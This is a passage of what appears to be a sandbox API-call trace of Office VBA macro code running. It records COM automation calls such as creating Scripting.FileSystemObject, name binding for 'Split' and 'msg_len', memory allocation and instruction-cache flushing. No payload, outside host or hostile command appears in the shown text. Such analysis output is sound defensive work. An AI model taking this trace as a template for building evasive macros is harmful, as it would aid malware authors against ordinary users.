0x2 [0159.913] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0160.040] VarBstrCat (in: bstrLeft="A", bstrRight="50", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0160.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0160.041] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0x9bcd6a0 [0160.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x9bcd6a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0160.041] IMalloc:Free (This=0x7fefecb5380, pv=0x9bcd6a0) [0160.041] longjmp () [0160.041] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0160.043] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x1ddfe0 | out: lpclsid=0x1ddfe0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0160.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0160.052] CoCreateInstance (in: rclsid=0x1ddfe0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee51b7890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1dde88 | out: ppv=0x1dde88*=0x51c6d0) returned 0x0 [0160.774] FileSystemObject:IUnknown:QueryInterface (in: This=0x51c6d0, riid=0x7fee51d2600*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x1ddea0 | out: ppvObject=0x1ddea0*=0x0) returned 0x80004002 [0160.774] FileSystemObject:IUnknown:QueryInterface (in: This=0x51c6d0, riid=0x7fee51d2610*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x1ddea8 | out: ppvObject=0x1ddea8*=0x0) returned 0x80004002 [0160.774] FileSystemObject:IUnknown:QueryInterface (in: This=0x51c6d0, riid=0x7fee51b78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ddec8 | out: ppvObject=0x1ddec8*=0x51c6d0) returned 0x0 [0160.774] FileSystemObject:IUnknown:Release (This=0x51c6d0) returned 0x1 [0160.775] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa5300 [0160.775] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x6, _Src=0x63a013a | out: _Dst=0x1dc9f0) returned 0x0 [0160.776] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x8, _Src=0x63a0162 | out: _Dst=0x1dc9f0) returned 0x0 [0160.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f3b0, cbMultiByte=1, lpWideCharStr=0x670029c, cchWideChar=4 | out: lpWideCharStr=",") returned 1 [0160.776] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.776] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.776] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.776] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.776] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.776] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.776] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bd6, cbMultiByte=6, lpWideCharStr=0x1dc590, cchWideChar=7 | out: lpWideCharStr="Split") returned 6 [0160.776] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Split", lHashVal=0x10298d, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bd6, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="Split") returned 6 [0160.777] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Split", lHashVal=0x10298d, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0xa121698, pDescKind=0x1dc59c*=1, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.777] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc590, pDummy=0x1 | out: ppTypeAttr=0x1dc590, pDummy=0x1) returned 0x0 [0160.777] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0160.777] ITypeInfo:GetRefTypeInfo (in: This=0xa121698, hreftype=0x480, ppTInfo=0x1dc2c8 | out: ppTInfo=0x1dc2c8*=0xa121488) returned 0x0 [0160.777] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc498 | out: ppvObject=0x1dc498*=0x0) returned 0x80004002 [0160.777] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121488, ppTypeAttr=0x1dc318, pDummy=0x10 | out: ppTypeAttr=0x1dc318, pDummy=0x10) returned 0x0 [0160.777] ITypeInfo:LocalReleaseTypeAttr (This=0xa121488) returned 0x0 [0160.778] IUnknown:Release (This=0xa121488) returned 0x1 [0160.778] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc330 | out: ppvObject=0x1dc330*=0xa121698) returned 0x0 [0160.778] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612790, invkind=1, pFuncIndex=0x1dc328 | out: pFuncIndex=0x1dc328*=0x36) returned 0x0 [0160.778] ITypeInfo2:GetParamCustData (in: This=0xa121698, indexFunc=0x36, indexParam=0x2, GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc338 | out: pVarVal=0x1dc338*(varType=0x0, wReserved1=0xa2d, wReserved2=0x0, wReserved3=0x0, varVal1=0xa166880, varVal2=0x1dd048)) returned 0x0 [0160.778] IUnknown:Release (This=0xa121698) returned 0x4 [0160.778] IUnknown:AddRef (This=0xa121488) returned 0x2 [0160.778] IUnknown:Release (This=0xa121488) returned 0x1 [0160.778] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc330 | out: ppvObject=0x1dc330*=0xa121698) returned 0x0 [0160.778] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612790, invkind=1, pFuncIndex=0x1dc328 | out: pFuncIndex=0x1dc328*=0x36) returned 0x0 [0160.778] ITypeInfo2:GetParamCustData (in: This=0xa121698, indexFunc=0x36, indexParam=0x3, GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc338 | out: pVarVal=0x1dc338*(varType=0x3, wReserved1=0xa2d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1dd048)) returned 0x0 [0160.778] IUnknown:Release (This=0xa121698) returned 0x4 [0160.778] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3f0 | out: ppvObject=0x1dc3f0*=0xa121698) returned 0x0 [0160.778] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612790, invkind=1, pFuncIndex=0x1dc430 | out: pFuncIndex=0x1dc430*=0x36) returned 0x0 [0160.778] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x36, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc448 | out: pVarVal=0x1dc448*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x36, varVal2=0x10298d)) returned 0x0 [0160.778] IUnknown:Release (This=0xa121698) returned 0x4 [0160.778] IUnknown:AddRef (This=0xa121488) returned 0x2 [0160.778] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc2e8 | out: ppvObject=0x1dc2e8*=0x0) returned 0x80004002 [0160.778] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc3a8 | out: ppvObject=0x1dc3a8*=0x0) returned 0x80004002 [0160.778] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc280 | out: ppvObject=0x1dc280*=0x0) returned 0x80004002 [0160.778] IUnknown:Release (This=0xa121488) returned 0x1 [0160.779] IUnknown:AddRef (This=0xa121698) returned 0x5 [0160.779] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0160.779] IUnknown:Release (This=0xa121698) returned 0x4 [0160.779] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc6b8 | out: ppvObject=0x1dc6b8*=0x0) returned 0x80004002 [0160.779] IUnknown:AddRef (This=0xa121698) returned 0x5 [0160.779] IUnknown:Release (This=0xa121698) returned 0x4 [0160.779] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.779] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.779] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.779] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.779] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.779] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.779] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.779] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.779] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.779] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0160.780] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.780] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.780] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.780] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.780] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.780] GetCurrentProcess () returned 0xffffffffffffffff [0160.780] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x63) returned 1 [0160.780] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0160.780] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x95e36d0 [0160.780] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.780] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.780] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.780] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.780] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.780] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.780] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bb2, cbMultiByte=2, lpWideCharStr=0x1dc590, cchWideChar=3 | out: lpWideCharStr="a") returned 2 [0160.780] ITypeComp:RemoteBind (in: This=0xa02b110, szName="a", lHashVal=0x101058, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bb2, cbMultiByte=2, lpWideCharStr=0x1dc5d0, cchWideChar=3 | out: lpWideCharStr="a") returned 2 [0160.781] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="a", lHashVal=0x101058, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bb2, cbMultiByte=2, lpWideCharStr=0x1dc5d0, cchWideChar=3 | out: lpWideCharStr="a") returned 2 [0160.781] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="a", lHashVal=0x101058, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bb2, cbMultiByte=2, lpWideCharStr=0x1dc5d0, cchWideChar=3 | out: lpWideCharStr="a") returned 2 [0160.781] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="a", lHashVal=0x101058, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bb2, cbMultiByte=2, lpWideCharStr=0x1dc5d0, cchWideChar=3 | out: lpWideCharStr="a") returned 2 [0160.781] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="a", lHashVal=0x101058, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.782] IMalloc:Alloc (This=0x7fefecb5380, cb=0x9) returned 0xa2b6550 [0160.782] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x2, _Src=0x5732bb2 | out: _Dst=0xa2b6550) returned 0x0 [0160.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_a") returned 0x10a201 [0160.782] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0x9, _Src="_B_var_a" | out: _Dst="_B_var_a") returned 0x0 [0160.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=9, lpWideCharStr=0x1dc530, cchWideChar=9 | out: lpWideCharStr="_B_var_a") returned 9 [0160.782] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.782] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_a", lHashVal=0x10a201, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.782] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.782] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0160.782] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_a", lHashVal=0x10a201, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.782] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0160.782] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0160.782] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_a", lHashVal=0x10a201, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.782] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0160.782] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0160.782] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_a", lHashVal=0x10a201, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.782] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0160.782] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.782] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a07a6, cbMultiByte=9, lpWideCharStr=0x1dc590, cchWideChar=10 | out: lpWideCharStr="_B_var_a") returned 9 [0160.783] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_a", lHashVal=0x10a201, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x61005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x61005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.783] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x2, _Src=0x5732bb2 | out: _Dst=0x1dc750) returned 0x0 [0160.783] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.784] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.784] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.784] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.784] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.784] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.784] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a018a, cbMultiByte=8, lpWideCharStr=0x1dc590, cchWideChar=9 | out: lpWideCharStr="msg_len") returned 8 [0160.784] ITypeComp:RemoteBind (in: This=0xa02b110, szName="msg_len", lHashVal=0x10dae9, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a018a, cbMultiByte=8, lpWideCharStr=0x1dc5d0, cchWideChar=9 | out: lpWideCharStr="msg_len") returned 8 [0160.785] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="msg_len", lHashVal=0x10dae9, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a018a, cbMultiByte=8, lpWideCharStr=0x1dc5d0, cchWideChar=9 | out: lpWideCharStr="msg_len") returned 8 [0160.785] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="msg_len", lHashVal=0x10dae9, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a018a, cbMultiByte=8, lpWideCharStr=0x1dc5d0, cchWideChar=9 | out: lpWideCharStr="msg_len") returned 8 [0160.785] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="msg_len", lHashVal=0x10dae9, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a018a, cbMultiByte=8, lpWideCharStr=0x1dc5d0, cchWideChar=9 | out: lpWideCharStr="msg_len") returned 8 [0160.785] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="msg_len", lHashVal=0x10dae9, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.785] IMalloc:Alloc (This=0x7fefecb5380, cb=0xf) returned 0xa2b6550 [0160.785] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x8, _Src=0x63a018a | out: _Dst=0xa2b6550) returned 0x0 [0160.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_msg_len") returned 0x10de6d [0160.785] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xf, _Src="_B_var_msg_len" | out: _Dst="_B_var_msg_len") returned 0x0 [0160.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=15, lpWideCharStr=0x1dc530, cchWideChar=15 | out: 